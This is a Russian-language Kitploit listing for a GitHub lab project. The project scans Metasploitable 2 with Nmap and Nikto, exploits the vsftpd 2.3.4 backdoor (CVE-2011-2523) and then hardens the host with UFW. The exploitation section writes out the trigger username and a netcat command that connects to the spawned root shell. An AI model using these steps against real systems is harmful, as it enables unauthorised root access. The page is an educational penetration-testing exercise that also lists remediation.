Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
network-security-lab — Контролируемая виртуальная лаборатория атак и защиты — эксплуатация CVE-2011-2523, разведка Nmap, сканирование Nikto, усиление защиты UFW на Metasploitable 2 | Kitploit
Инструменты/GitHubGitHub/amirmuhammadmarvi/network-security-lab
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияАудит конфигурацииВеб-безопасностьСетевая безопасностьТестирование на ПроникновениеОбучение и Образование

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Лаборатории и Практика
GitHubamirmuhammadmarvi/network-security-lab

network-security-lab

Контролируемая виртуальная лаборатория атак и защиты — эксплуатация CVE-2011-2523, разведка Nmap, сканирование Nikto, усиление защиты UFW на Metasploitable 2

Репозиторий
33 месяцев назадЕщё не проверено
Поделиться

🔬 Лаборатория сетевой безопасности

Контролируемая виртуальная среда, моделирующая реальные сценарии атак и защиты

Python Platform CVE Status


📋 Обзор

Эта лабораторная работа моделирует реальный тест на проникновение и упражнение по усилению защиты в полностью изолированной виртуальной среде. Она демонстрирует полный жизненный цикл наступательной безопасности — от разведки до эксплуатации — и защитные меры, которые смягчают каждый риск.

Ключевой результат: Получен полный root-доступ к целевой машине менее чем за 60 секунд путем эксплуатации известного бэкдора, без учетных данных и специальных инструментов.


🏗 Лабораторная среда

КомпонентДетали
ГипервизорVMware Workstation
СетьHost-Only / NAT (полностью изолирована)
ОС атакующегоUbuntu 24 LTS
Целевая ОСMetasploitable 2 (Linux 2.6.x)
IP атакующего192.168.148.255
Целевой IP192.168.148.130

🎯 Методология

root@kitploit:~
Reconnaissance  →  Scanning  →  Exploitation  →  Defense & Hardening

🔍 Фаза 1 — Разведка

Сканирование портов с помощью Nmap

root@kitploit:~
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt

Ключевые результаты — всего 23 открытых порта:

Сканирование веб-приложений с помощью Nikto

root@kitploit:~
nikto -h http://192.168.148.130 -o nikto_before.txt

Обнаружено 18 уязвимостей, в том числе:

  • phpMyAdmin открыт публично
  • phpinfo.php — утечка полной конфигурации сервера
  • HTTP TRACE включен (атаки XST)
  • Включен просмотр каталогов в /doc/, /test/
  • Устаревшие Apache 2.2.8 и PHP 5.2.4

💥 Фаза 2 — Эксплуатация

CVE-2011-2523 — Бэкдор в vsftpd 2.3.4

vsftpd 2.3.4 содержит бэкдор, внедренный в результате компрометации цепочки поставок. Отправка имени пользователя, заканчивающегося на :), заставляет сервер открыть root-оболочку на порту 6200.

root@kitploit:~
# Step 1 — Trigger the backdoor via FTP
ftp 192.168.148.130
# Username: backdoor:)   Password: anything

# Step 2 — Connect to the spawned shell
nc 192.168.148.130 6200

# Step 3 — Verify access
whoami
# → root

Результат: Полный доступ на уровне root получен менее чем за 60 секунд — без учетных данных, без необходимости в эксплойт-фреймворке.

Воздействие: Злоумышленник с root-доступом может читать/изменять/удалять любые файлы, устанавливать вредоносное ПО, похищать данные или перемещаться на другие хосты в сети.


🛡 Фаза 3 — Защита и усиление

Файервол UFW — Политика запрета по умолчанию

root@kitploit:~
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp    # SSH only
sudo ufw status verbose

Рекомендуемые меры по устранению


📄 Полный отчет

Смотрите report.md для полной оценки — полная методология, выводы команд, таблица результатов, шаги эксплуатации и все рекомендации по устранению.


⚠️ Правовое предупреждение

Эта лабораторная работа была выполнена в полностью изолированной виртуальной среде с использованием намеренно уязвимого программного обеспечения (Metasploitable 2). Все методы предназначены только для образовательных целей и портфолио. Не повторяйте в системах, которыми вы не владеете или не имеете явного письменного разрешения на тестирование.


🛠 Использованные инструменты


Автор: Amir Mohammad Marwi

Portfolio LinkedIn GitHub

Скачать инструмент
ПортСлужбаВерсияРиск
21FTPvsftpd 2.3.4🔴 КРИТИЧЕСКИЙ — Известный бэкдор (CVE-2011-2523)
22SSHOpenSSH 4.7p1🟡 СРЕДНИЙ — Устарел
23TelnetLinux telnetd🟠 ВЫСОКИЙ — Протокол в открытом виде
80HTTPApache 2.2.8🟠 ВЫСОКИЙ — Несколько CVE
1524BindshellRoot shell🔴 КРИТИЧЕСКИЙ — Открытая root-оболочка
3306MySQL5.0.51a🟠 ВЫСОКИЙ — База данных открыта
5900VNCProtocol 3.3🟠 ВЫСОКИЙ — Слабая аутентификация
6667IRCUnrealIRCd🔴 КРИТИЧЕСКИЙ — Известный бэкдор
УязвимостьИсправление
Бэкдор vsftpd 2.3.4Обновить до vsftpd 3.x или перейти на SFTP
Открытая root-оболочка (порт 1524)Немедленно отключить, проверить установку
Telnet (порт 23)Отключить — использовать только SSH
phpMyAdmin открытОграничить по IP, требовать надежную аутентификацию
MySQL открыт (порт 3306)Привязать к localhost, заблокировать внешний доступ
VNC открыт (порт 5900)Ограничить по IP или отключить
Просмотр каталоговApache: Options -Indexes
HTTP TRACEApache: TraceEnable off
Устаревшие Apache + PHPОбновить до поддерживаемых LTS-версий
ИнструментНазначение
NmapСканирование портов и обнаружение служб
NiktoСканирование веб-уязвимостей
NetcatПодключение к оболочке бэкдора
UFWКонфигурация межсетевого экрана на хосте
FTP клиентЗапуск бэкдора vsftpd
VMware WorkstationВиртуализация лаборатории